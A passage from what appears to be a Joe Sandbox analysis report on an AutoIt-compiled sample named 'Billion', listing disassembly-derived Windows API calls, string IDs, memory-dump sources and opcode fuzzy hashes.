                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ef994b2292b9d08cb9cc439aed5cdf0765f27f544a0990ad675da5174fa27627
                                                                                                                                                                                                                                                                                                          • Instruction ID: 79db878f3b9a17053c386529f8f28fe5ccd1e8ef884d372cad02ae7d45ed1ed0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef994b2292b9d08cb9cc439aed5cdf0765f27f544a0990ad675da5174fa27627
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E012B0C00214EFCF409FA0E808A5DBFF1BB18310F108469F84AE36A0CB38A982DF00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001341EA: _wcslen.LIBCMT ref: 001341EF
                                                                                                                                                                                                                                                                                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 001A5919
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: *$LPT
                                                                                                                                                                                                                                                                                                          • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                                          • Opcode ID: b283ef49ea117909da74e0e11b2527b73e2790e9c6a4cf8c06ef50d3ef1cc7b8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 46d8cbb692731eeb541f33f354b0d4143108405e4a36d020d916b179fed6eab1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b283ef49ea117909da74e0e11b2527b73e2790e9c6a4cf8c06ef50d3ef1cc7b8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C918D79A04604DFCB14CF54C4C4EAABBF2AF45318F198099E84A9F362C775EE85CB90
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 001958AF
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ContainedObject
                                                                                                                                                                                                                                                                                                          • String ID: 0$ $Container
                                                                                                                                                                                                                                                                                                          • API String ID: 3565006973-1883905345
                                                                                                                                                                                                                                                                                                          • Opcode ID: ebaeba3a955eaa4820ce4531e504725e1626176e0a2151520ce1ef6bb73bca51
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6a7dfd130d2d6825fbe336d545043d6ad10bbd187c7128986294d4bfe7b82a62
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebaeba3a955eaa4820ce4531e504725e1626176e0a2151520ce1ef6bb73bca51
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B815870200601EFDB15DF64C984B6ABBF9FF48714F10856EF94A9B2A1DBB1E845CB50
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 0015E67D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                                          • String ID: pow
                                                                                                                                                                                                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                                          • Opcode ID: f27ad52df4e19fa3328bc8a71146f8db73d0af1109addb0fdc20c09186fc22bf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6f2110eca347572cb7b512970b6c6351352e2ba9c4cd51ad15107e08e80a8e3f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f27ad52df4e19fa3328bc8a71146f8db73d0af1109addb0fdc20c09186fc22bf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C519E71E09102CAC7197714CD0136A3BE4AB21781F304F59F8B54A2E9DF358EEA9A47
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: #
                                                                                                                                                                                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                                          • Opcode ID: d6e0c24aa3e0a60651b22e22fca92dc3807fbfe2721e7925e8503b382a8e9ea6
                                                                                                                                                                                                                                                                                                          • Instruction ID: c39f781d3c007bafaf6c019b561db22f0724e948621e06848348b07fa70d2ec1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6e0c24aa3e0a60651b22e22fca92dc3807fbfe2721e7925e8503b382a8e9ea6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23515572504246DFCB25EF28C451BFA7BA4EF25314FA64059F8919B2E1DB309E82CB61
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 0014F6DB
                                                                                                                                                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0014F6F4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                                                          • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001ADB75
                                                                                                                                                                                                                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001ADB7F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: |
                                                                                                                                                                                                                                                                                                          • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 001C40BD
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001C40F8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                                                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 001C50BD
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001C50D2
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID: '
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00132234: GetWindowLongW.USER32(?,000000EB), ref: 00132242
                                                                                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00173440
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 001734CA
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LongWindow$ParentProc
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 2181805148-2181176062
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001378B1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137873: GetStockObject.GDI32(00000011), ref: 001378C5
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137873: SendMessageW.USER32(00000000,00000030,00000000), ref: 001378CF
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 001C4216
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000012), ref: 001C4230
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                                                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001AD7C2
                                                                                                                                                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 001AD7EB
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                                          • String ID: <local>
                                                                                                                                                                                                                                                                                                          • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?,?), ref: 0019761D
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00197629
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                          • String ID: STOP
                                                                                                                                                                                                                                                                                                          • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                                          • Opcode ID: 054270d0bcffc8f62b4ec334aae1858f75e3c4e37094c28a4383275b1f83f344
                                                                                                                                                                                                                                                                                                          • Instruction ID: 90a031faa7db4b6bd186a15a0ae46dcf69f6a150045801014a5031b6a3f75c80
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 054270d0bcffc8f62b4ec334aae1858f75e3c4e37094c28a4383275b1f83f344
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D601C032A28A2A8BEF20AEBDDC919BF77B5BF60754B400524E421D62D1FB31D940C690
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00194620
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00192699
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                          • Opcode ID: f2abb165bf2ec98124fd92a45fdb6a9c70a360885529d829bf6925eb77fd20c2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2025842c578b1b5a8eb256c94ecfbd66f0ff9b780d83fb83c8249efb7e0d80b0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2abb165bf2ec98124fd92a45fdb6a9c70a360885529d829bf6925eb77fd20c2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B201D475604228BBCF08EBA4CC91DFE7768FF56350F000619F932972C1EB315809C650
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00194620
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00192593
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8191d3d31736c863a6ee834abcfe3bf7f7e741bea381fd43f2b7b44753a61212
                                                                                                                                                                                                                                                                                                          • Instruction ID: 53c0eb92a1f58677d3f07c00c55372268ff44fd1c41915c176f90b5c342aa98b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8191d3d31736c863a6ee834abcfe3bf7f7e741bea381fd43f2b7b44753a61212
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C01D675B40208BBDF04E7A0C962EFF77A9DF65344F510029BA02A7281EB70DE08C6B1
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00194620
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00192615
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                          • Opcode ID: 68076234c3ee929e2de00deb8b56b231f40c583e165ad64508d45081b27255a2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 29322b21da89d72c6a9d1e0e34cbb6c5c3a617530aa42781f96e9254febf7fa0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68076234c3ee929e2de00deb8b56b231f40c583e165ad64508d45081b27255a2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6801D175A44108BBDF05E7A0D942EFF77A89F26344F50002AB902E3281EB719E09D6B1
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00194620
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00192720
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 001C9B6D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00132234: GetWindowLongW.USER32(?,000000EB), ref: 00132242
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 001C9B53
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LongWindow$MessageProcSend
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 982171247-2181176062
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C8471
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 001C847F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 1378638983-2181176062
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0019146F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                          • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0014FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001510E2,?,?,?,0013100A), ref: 0014FAD9
